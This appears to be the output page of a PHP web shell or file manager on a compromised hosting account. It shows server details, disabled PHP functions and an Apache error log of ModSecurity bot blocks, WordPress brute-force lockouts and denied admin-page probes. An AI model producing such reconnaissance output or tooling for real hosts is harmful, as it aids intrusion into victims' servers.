HEX
Server: Apache
System: Linux vpshost0650.publiccloud.com.br 4.4.79-grsec-1.lc.x86_64 #1 SMP Wed Aug 2 14:18:21 -03 2017 x86_64
User: bandeirantesbomb3 (10068)
PHP: 8.0.7
Disabled: apache_child_terminate,dl,escapeshellarg,escapeshellcmd,exec,link,mail,openlog,passthru,pcntl_alarm,pcntl_exec,pcntl_fork,pcntl_get_last_error,pcntl_getpriority,pcntl_setpriority,pcntl_signal,pcntl_signal_dispatch,pcntl_sigprocmask,pcntl_sigtimedwait,pcntl_sigwaitinfo,pcntl_strerror,pcntl_wait,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,php_check_syntax,php_strip_whitespace,popen,proc_close,proc_open,shell_exec,symlink,system
Upload Files
File: /home/storage/0/fc/16/bandeirantesbomb3/logs/error_log
[Sun Mar 15 03:17:30.071144 2026] [ssl:warn] [pid 6229:tid 140412349433728] AH01909: bandeirantesbomb3.hospedagemdesites.ws:443:0 server certificate does NOT include an ID which matches the server name
[Sun Mar 15 03:20:21.908692 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.244.31:41284] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZPpbABkC4fWIHEf8EUawAAAFI"]
[Sun Mar 15 03:22:45.016228 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.228.16:57704] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZQNbABkC4fWIHEf8EU3gAAAEY"]
[Sun Mar 15 03:25:27.150757 2026] [:error] [pid 21946:tid 140411699963648] [client 74.7.244.31:50058] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZQ1nbQATo66fKoS7xsZgAAAMU"]
[Sun Mar 15 03:27:48.291248 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.228.16:41760] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZRZLABkC4fWIHEf8EVvwAAAEs"]
[Sun Mar 15 03:30:42.844647 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.244.31:37920] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZSErABkC4fWIHEf8EWLgAAAEY"]
[Sun Mar 15 03:33:07.819009 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.228.16:34980] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZSoXjZBu2q05ozVU9-dwAAAUs"]
[Sun Mar 15 03:35:13.589259 2026] [:error] [pid 21805:tid 140411741927168] [client 129.146.135.227:54487] [client 129.146.135.227] ModSecurity: Access denied with code 403 (phase 2). Operator GT matched 0 at IP:flag_b. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_98_wordpress.conf"] [line "48"] [id "000020"] [msg "WAF Rules : WordPress, 5 auth failures in 60 seconds - blocked for 10 minutes"] [hostname "bandeirantesbombas.com.br"] [uri "/wp-login.php"] [unique_id "abZTIbABkC4fWIHEf8EXLAAAAEA"], referer: https://bandeirantesbombas.com.br/wp-login.php
[Sun Mar 15 03:35:25.008263 2026] [access_compat:error] [pid 21806:tid 140411683178240] [client 141.98.11.23:52595] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/upgrade.php, referer: www.google.com
[Sun Mar 15 03:35:29.079079 2026] [access_compat:error] [pid 21946:tid 140411716749056] [client 141.98.11.23:53310] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/theme-install.php, referer: www.google.com
[Sun Mar 15 03:35:59.230034 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.244.31:49550] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZTT9SswJuvopo3lOiR4AAAAJM"]
[Sun Mar 15 03:36:04.206592 2026] [:error] [pid 21533:tid 140411741927168] [client 129.146.135.227:53097] [client 129.146.135.227] ModSecurity: Access denied with code 403 (phase 2). Operator GT matched 0 at IP:flag_b. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_98_wordpress.conf"] [line "48"] [id "000020"] [msg "WAF Rules : WordPress, 5 auth failures in 60 seconds - blocked for 10 minutes"] [hostname "bandeirantesbombas.com.br"] [uri "/wp-login.php"] [unique_id "abZTVHjZBu2q05ozVU9_ZwAAAUA"], referer: https://bandeirantesbombas.com.br/wp-login.php
[Sun Mar 15 03:42:16.972785 2026] [:error] [pid 21805:tid 140411590858496] [client 129.146.135.227:63615] [client 129.146.135.227] ModSecurity: Access denied with code 403 (phase 2). Operator GT matched 0 at IP:flag_b. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_98_wordpress.conf"] [line "48"] [id "000020"] [msg "WAF Rules : WordPress, 5 auth failures in 60 seconds - blocked for 10 minutes"] [hostname "bandeirantesbombas.com.br"] [uri "/wp-login.php"] [unique_id "abZUyLABkC4fWIHEf8EZhQAAAFI"], referer: https://bandeirantesbombas.com.br/wp-login.php
[Sun Mar 15 03:48:48.417398 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.228.16:35784] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZWUNSswJuvopo3lOiUfAAAAIU"]
[Sun Mar 15 03:51:52.033328 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.244.31:59270] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZXCLABkC4fWIHEf8EbwwAAAEw"]
[Sun Mar 15 03:54:13.879629 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.228.16:36466] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZXldSswJuvopo3lOiWEQAAAIw"]
[Sun Mar 15 03:57:04.586739 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.244.31:37632] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZYQHbQATo66fKoS7xzWgAAANc"]
[Sun Mar 15 03:59:14.806240 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.228.16:39056] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZYwnjZBu2q05ozVU-FgwAAAUU"]
[Sun Mar 15 04:02:25.903185 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.244.31:51936] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZZgdSswJuvopo3lOiXZwAAAJM"]
[Sun Mar 15 04:04:41.789626 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.228.16:41336] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZaCXbQATo66fKoS7x05wAAAM8"]
[Sun Mar 15 04:07:31.099101 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.244.31:35354] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZas7ABkC4fWIHEf8Ee7wAAAFE"]
[Sun Mar 15 04:09:52.076697 2026] [:error] [pid 21946:tid 140411683178240] [client 74.7.228.16:37196] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZbQHbQATo66fKoS7x14AAAAMc"]
[Sun Mar 15 04:12:51.760046 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.244.31:52464] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZb87ABkC4fWIHEf8Ef6wAAAFU"]
[Sun Mar 15 04:15:17.654365 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.228.16:53710] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZchbABkC4fWIHEf8EgRgAAAEU"]
[Sun Mar 15 04:18:04.227703 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.244.31:44758] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZdLHjZBu2q05ozVU-ItgAAAUM"]
[Sun Mar 15 04:20:29.499472 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.228.16:39392] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZdvdSswJuvopo3lOiaeQAAAI8"]
[Sun Mar 15 04:23:21.775842 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.244.31:51118] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZeadSswJuvopo3lOibBAAAAIk"]
[Sun Mar 15 04:25:55.322841 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.228.16:40948] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZfA3bQATo66fKoS7x5BAAAAMI"]
[Sun Mar 15 04:28:32.635419 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.244.31:45304] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZfoHbQATo66fKoS7x5iAAAAM0"]
[Sun Mar 15 04:30:58.472517 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.228.16:45208] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZgMrABkC4fWIHEf8EjBwAAAFg"]
[Sun Mar 15 04:33:56.235866 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.244.31:45336] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZg5NSswJuvopo3lOic3AAAAI8"]
[Sun Mar 15 04:36:17.234498 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.228.16:43090] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZhcXjZBu2q05ozVU-L0gAAAVQ"]
[Sun Mar 15 04:39:06.459821 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.244.31:60100] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZiGnbQATo66fKoS7x7jAAAAM8"]
[Sun Mar 15 04:52:00.097615 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.228.16:42534] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZlIHjZBu2q05ozVU-OcwAAAVQ"]
[Sun Mar 15 04:55:00.963720 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.244.31:55270] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZl1HjZBu2q05ozVU-O2QAAAUs"]
[Sun Mar 15 04:57:21.918825 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.228.16:55818] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZmYbABkC4fWIHEf8EnUQAAAFc"]
[Sun Mar 15 05:00:09.542199 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.244.31:36400] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZnCXjZBu2q05ozVU-PnAAAAUU"]
[Sun Mar 15 05:02:30.098788 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.228.16:52486] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZnlrABkC4fWIHEf8EocwAAAFc"]
[Sun Mar 15 05:05:34.327313 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.244.31:33046] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZoTtSswJuvopo3lOiiNgAAAIs"]
[Sun Mar 15 05:07:49.774938 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.228.16:36948] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZo1dSswJuvopo3lOiijAAAAIA"]
[Sun Mar 15 05:10:40.284649 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.244.31:49396] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZpgNSswJuvopo3lOijIQAAAIo"]
[Sun Mar 15 05:13:00.546857 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.228.16:49240] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZqDHbQATo66fKoS7yBmAAAAMA"]
[Sun Mar 15 05:16:02.548821 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.244.31:56110] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZqwnbQATo66fKoS7yCBAAAAMQ"]
[Sun Mar 15 05:18:21.139102 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.228.16:39856] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZrTdSswJuvopo3lOikVgAAAIw"]
[Sun Mar 15 05:20:06.395859 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.228.16:60442] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZrttSswJuvopo3lOiktAAAAIw"]
[Sun Mar 15 05:21:13.405857 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.244.31:60650] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZr-bABkC4fWIHEf8ErsQAAAFM"]
[Sun Mar 15 05:23:23.375460 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.228.16:49836] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZse3jZBu2q05ozVU-T0gAAAVI"]
[Sun Mar 15 05:26:31.057966 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.244.31:42350] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZtN3jZBu2q05ozVU-URAAAAUY"]
[Sun Mar 15 05:28:48.652978 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.228.16:47616] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZtwLABkC4fWIHEf8Es5QAAAE8"]
[Sun Mar 15 05:31:36.730828 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.244.31:44440] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZuaNSswJuvopo3lOimtAAAAIU"]
[Sun Mar 15 05:33:55.316823 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.228.16:57962] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZu83jZBu2q05ozVU-VbAAAAUw"]
[Sun Mar 15 05:37:04.459818 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.244.31:33596] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZvsHjZBu2q05ozVU-V9AAAAUk"]
[Sun Mar 15 05:39:16.565787 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.228.16:60116] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZwNHjZBu2q05ozVU-WVgAAAUQ"]
[Sun Mar 15 05:42:11.935122 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.244.31:44368] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZw43bQATo66fKoS7yGSQAAAMQ"]
[Sun Mar 15 05:55:00.299465 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.228.16:44756] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZz5HbQATo66fKoS7yJbAAAAM4"]
[Sun Mar 15 05:57:55.230330 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.244.31:34086] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abZ0k9SswJuvopo3lOircwAAAJY"]
